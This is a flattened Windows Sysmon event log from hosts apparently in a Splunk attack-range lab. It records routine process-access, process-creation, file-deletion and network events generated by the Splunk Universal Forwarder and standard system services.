11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-141D-6216-AA04-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.404{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-141D-6216-AA04-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.405{4F8D34B0-141D-6216-AA04-000000003902}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:49.326{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78DFA293EB09FF1F4CB6FFF92D854B55,SHA256=D8CD0FB0132A1E4AAED6C4A7B24B70BC8BE826F8008CE2CB8F09E67995837F59,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:47.649{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53880-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000218583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:46.493{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51470-false10.0.1.12-8000- 23542300x8000000000000000218614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.717{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C5B8E6FC2AF376B84D1F3570273EF9,SHA256=B2D6B52A0FB6181E4D5DE40D14160C32D8A289ECD0AECD0B480271772BF4BAAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.717{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60FE200D0E3052D6DA877D56A1F7DD03,SHA256=EED5773E377D4EB1C926A9F3A1BC1A72042961C7E327E92FE298106DD8E53D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:50.724{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D710E8391B9CF0FA4EC7CD7E3508079F,SHA256=7E0EF31795B49FBDB61FB32959F44B202D4FD0740B7151EBCF9FDA908B0A616E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.328{4F8D34B0-141E-6216-AB04-000000003902}20881416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-141E-6216-AB04-000000003902}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-141E-6216-AB04-000000003902}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.076{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-141E-6216-AB04-000000003902}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:50.077{4F8D34B0-141E-6216-AB04-000000003902}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.936{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413C35763EA61CE816F96F3A9C077BC5,SHA256=B9F9D9834A205E94DDF7FACA49AE2F14D3912881B0871A9CE5EB1914B47A37FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:51.737{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F24AF09C35F53E65469C5EABDAC446F,SHA256=F8C84DEA6B82F66950C593EB702C192AA6E4F7F8805D29B46DF8C763C24CDD5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-141F-6216-AC04-000000003902}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:51.436{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 